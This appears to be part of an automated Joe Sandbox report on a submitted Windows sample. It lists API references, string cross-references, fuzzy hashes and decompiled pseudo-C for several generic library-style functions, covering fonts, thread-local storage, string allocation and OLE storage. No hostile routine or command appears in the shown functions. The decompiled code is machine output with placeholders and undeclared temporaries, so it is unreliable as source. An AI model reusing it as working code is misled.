0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 00410BFE
GetStockObject.GDI32(0000000D), ref: 00410C06
GetObjectA.GDI32(00000000,0000003C,?), ref: 00410C13
GetDC.USER32(00000000), ref: 00410C22
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00410C36
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00410C42
ReleaseDC.USER32 ref: 00410C4E

Strings

System, xrefs: 00410BF9, 00410C63

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
Instruction ID: a4a223aa5b9c112fe65b1d2b54281de720986542eecb78d2bebc38cd9b2bbfe9
Opcode Fuzzy Hash: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
Instruction Fuzzy Hash: F5118675700218EBEB149BA1DC45FEF7BB8AF54745F000126F601A7280EBB49D45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F361, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0040F361(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E0041F71D(E0043284B, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E0040F014(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x436638;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E0040F130( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E0040EAD1(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E0040EAD1(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E004037AF(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E0041F330(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E0041F7C2(_t36);
			}

0x0040f361
0x0040f368
0x0040f36d
0x0040f36f
0x0040f372
0x0040f376
0x0040f379
0x0040f37f
0x0040f386
0x0040f487
0x0040f395
0x0040f39d
0x0040f3a1
0x0040f3d5
0x0040f3d8
0x0040f3dd
0x0040f3df
0x0040f3eb
0x0040f3eb
0x0040f3e1
0x0040f3e1
0x0040f3e7
0x0040f3e7
0x0040f3ed
0x0040f3f2
0x0040f3f5
0x0040f3f8
0x0040f3fb
0x00000000
0x0040f3a3
0x0040f3a3
0x0040f3a9
0x0040f3b8
0x0040f3b8
0x0040f3bb
0x0040f41f
0x0040f425
0x0040f42a
0x0040f3bd
0x0040f3c2
0x0040f3c8
0x0040f3cb
0x0040f3cb
0x0040f430
0x0040f432
0x0040f437
0x0040f43d
0x0040f43d
0x0040f445
0x0040f456
0x0040f462
0x0040f467
0x0040f46d
0x0040f46d
0x0040f3a9
0x0040f470
0x0040f475
0x0040f47f
0x0040f47f
0x0040f482
0x0040f482
0x0040f488
0x0040f493

APIs

__EH_prolog3_catch.LIBCMT ref: 0040F368
EnterCriticalSection.KERNEL32(?,00000010,0040F604,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F379
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F397
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F3CB
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437
_memset.LIBCMT ref: 0040F456
TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
Instruction ID: caa35618f7ee786639fd244a17305f6c3d39311c605f35e51643f12fe2b3081d
Opcode Fuzzy Hash: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
Instruction Fuzzy Hash: B331C374400605AFCB20AF50D885CAEB7A4FF54314B20C53FE956A7A90CB34AE95CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DE, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041C1DE(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x443590; // 0xa920217c
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E0041F330(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E0040EC01(_t74, 0x437038);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E0040EC01(_t74, "dNC");
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E0041E5DF(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

0x0041c1de
0x0041c1df
0x0041c1ec
0x0041c1f3
0x0041c1fa
0x0041c201
0x0041c207
0x0041c20d
0x0041c21f
0x0041c222
0x0041c229
0x0041c22f
0x0041c299
0x0041c29b
0x0041c2a0
0x0041c2a2
0x0041c2aa
0x0041c2ab
0x0041c2be
0x0041c2c3
0x0041c2c8
0x0041c2ad
0x0041c2ad
0x0041c2b2
0x0041c2b7
0x0041c2b7
0x0041c231
0x0041c234
0x0041c23b
0x0041c241
0x0041c247
0x0041c24a
0x0041c24d
0x0041c251
0x0041c266
0x0041c269
0x0041c269
0x0041c26e
0x0041c271
0x0041c275
0x0041c28a
0x0041c28d
0x0041c28d
0x0041c275
0x0041c2e2
0x0041c2e5
0x0041c2ec
0x0041c2ef
0x0041c30b
0x0041c30e
0x0041c30e
0x0041c316
0x0041c318
0x0041c31b
0x0041c33a
0x0041c33d
0x0041c33d
0x0041c31b
0x0041c348
0x0041c349
0x0041c34c
0x0041c359

APIs

_memset.LIBCMT ref: 0041C20D
SysAllocString.OLEAUT32(00000000), ref: 0041C25E
SysAllocString.OLEAUT32(00000000), ref: 0041C282

Part of subcall function 004036AB: __EH_prolog3.LIBCMT ref: 004036B2

SysAllocString.OLEAUT32(00000000), ref: 0041C2DA
SysAllocString.OLEAUT32(00000000), ref: 0041C303
SysAllocString.OLEAUT32(00000000), ref: 0041C332

Strings

dNC, xrefs: 0041C294

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AllocString$H_prolog3_memset
String ID: dNC
API String ID: 842698744-833669199
Opcode ID: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
Instruction ID: 9748dfd0f260f4af5954bde45890adc7de7677ef7dc0e4187cfbdd75b949ec51
Opcode Fuzzy Hash: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
Instruction Fuzzy Hash: 394171309002089FCB34EFB9CC91A9EB7B4AF44318F10856FE465A72E2DB79A554CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00417FED, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00417FED(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				short* _t48;
				intOrPtr _t55;
				void* _t56;
				void* _t59;

				_t59 = __eflags;
				_push(4);
				E0041F6EA(E00433268, __ebx, __edi, __esi);
				_t55 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E004048ED(__ecx, _t59);
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x436c84;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t56 + 8));
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x88)) = 0;
				 *((intOrPtr*)(__ecx + 0x8c)) = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x94)) = 0;
				 *((intOrPtr*)(__ecx + 0x98)) = 0;
				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				E00402890(__ecx + 0xa4);
				 *((char*)(_t56 - 4)) = 1;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
				E0041C6AB(__ecx + 0xbc);
				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc8)) = 0x436ab8;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0x436c04;
				 *((intOrPtr*)(__ecx + 0xd0)) = 0x436ae0;
				 *((intOrPtr*)(__ecx + 0xd4)) = 0x436b0c;
				 *((intOrPtr*)(__ecx + 0xd8)) = 0x436b2c;
				 *((intOrPtr*)(__ecx + 0xdc)) = 0x436b44;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x436b64;
				_t48 = __ecx + 0xac;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0x436b78;
				 *((intOrPtr*)(__ecx + 0xe8)) = 0x436ba4;
				E0041F330(0, _t48, 0, 0x10);
				 *_t48 = 0;
				return E0041F7C2(_t55);
			}

0x00417fed
0x00417fed
0x00417ff4
0x00417ff9
0x00417ffb
0x00417ffe
0x00418006
0x00418012
0x00418015
0x0041801b
0x0041801e
0x00418021
0x00418024
0x00418027
0x0041802a
0x0041802d
0x00418030
0x00418033
0x00418036
0x00418039
0x0041803f
0x00418045
0x0041804b
0x00418051
0x00418057
0x0041805d
0x00418063
0x0041806e
0x00418072
0x00418078
0x0041807d
0x00418083
0x0041808d
0x00418097
0x004180a1
0x004180ab
0x004180b5
0x004180c1
0x004180cb
0x004180d2
0x004180dd
0x004180e7
0x004180ef
0x004180f9

APIs

__EH_prolog3.LIBCMT ref: 00417FF4
_memset.LIBCMT ref: 004180E7

Strings

DkC, xrefs: 004180B5
jC, xrefs: 00418097
xkC, xrefs: 004180D2
,kC, xrefs: 004180AB
dkC, xrefs: 004180C1

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3_memset
String ID: ,kC$DkC$dkC$xkC$jC
API String ID: 2828583354-3858571362
Opcode ID: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
Instruction ID: 4e71a2d175be7ae7ae6f7a1d80f1dc51b3f0f7cb739eefa1d1a8814e24de44bf
Opcode Fuzzy Hash: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
Instruction Fuzzy Hash: E73190B0801B51DAD320DF2AC54578AFBE4BFA5308F11DA0FD1EA97661C7B86149CF29

Uniqueness

Uniqueness Score: -1.00%

Function 004148AC, Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004148AC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E0041F6EA(E00432DB2, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E00413164(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x439410, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E0041F7C2(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x4394a0, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E00411776(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E0041D04F(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E00411738(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x4394b0);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E00412F6B(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x439390, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

0x004148ac
0x004148b3
0x004148b8
0x004148ba
0x004148bf
0x004148c4
0x004148c7
0x004148e8
0x004148ee
0x004148f1
0x004148f4
0x004148f7
0x00414900
0x00414908
0x0041490b
0x0041493e
0x0041493e
0x00414943
0x004149a8
0x004149ab
0x00414a17
0x00414a17
0x00414a1b
0x00414a25
0x00414a27
0x00414a29
0x00414b78
0x00414b7b
0x00414b95
0x00414b95
0x00414b9a
0x00414b9f
0x00414b9f
0x00414ba5
0x00414bac
0x00414bac
0x00414bb3
0x00414bb6
0x00414bbb
0x00414bbb
0x00414b7d
0x00414b7d
0x00414b81
0x00414b88
0x00414b8b
0x00414b90
0x00414b93
0x00414b93
0x00000000
0x00414b81
0x00414a2f
0x00414a31
0x00414a8b
0x00414a8e
0x00414b40
0x00414b47
0x00414b47
0x00414b4a
0x00414b4d
0x00414b50
0x00414b53
0x00000000
0x00000000
0x00414b58
0x00414b5a
0x00414b64
0x00414b66
0x00414b75
0x00414b75
0x00414b64
0x00000000
0x00414b58
0x00414a98
0x00414a9b
0x00414a9d
0x00414aa0
0x00414ad9
0x00414ad9
0x00414ae0
0x00414ae3
0x00414ae3
0x00414ae6
0x00414ae9
0x00000000
0x00000000
0x00414aeb
0x00414af4
0x00414afa
0x00414afc
0x00414aff
0x00000000
0x00000000
0x00414b01
0x00414b0d
0x00414b10
0x00414b16
0x00414b18
0x00414b1b
0x00414b1d
0x00414b29
0x00414b2c
0x00414b32
0x00414b32
0x00414b35
0x00414b38
0x00414b3b
0x00000000
0x00414b3b
0x00414aa2
0x00414aa9
0x00414aab
0x00414ab1
0x00414ab3
0x00414ab6
0x00000000
0x00000000
0x00414ab9
0x00414abf
0x00414ac1
0x00000000
0x00000000
0x00414acb
0x00414ad1
0x00000000
0x00414ad1
0x00414aa4
0x00414aa7
0x00000000
0x00000000
0x00000000
0x00414aa7
0x00414a33
0x00414a3a
0x00414a3d
0x00414a43
0x00414a45
0x00414a48
0x00000000
0x00000000
0x00414a4e
0x00414a5b
0x00414a5e
0x00414a64
0x00414a66
0x00414a69
0x00414a6b
0x00414a77
0x00414a7a
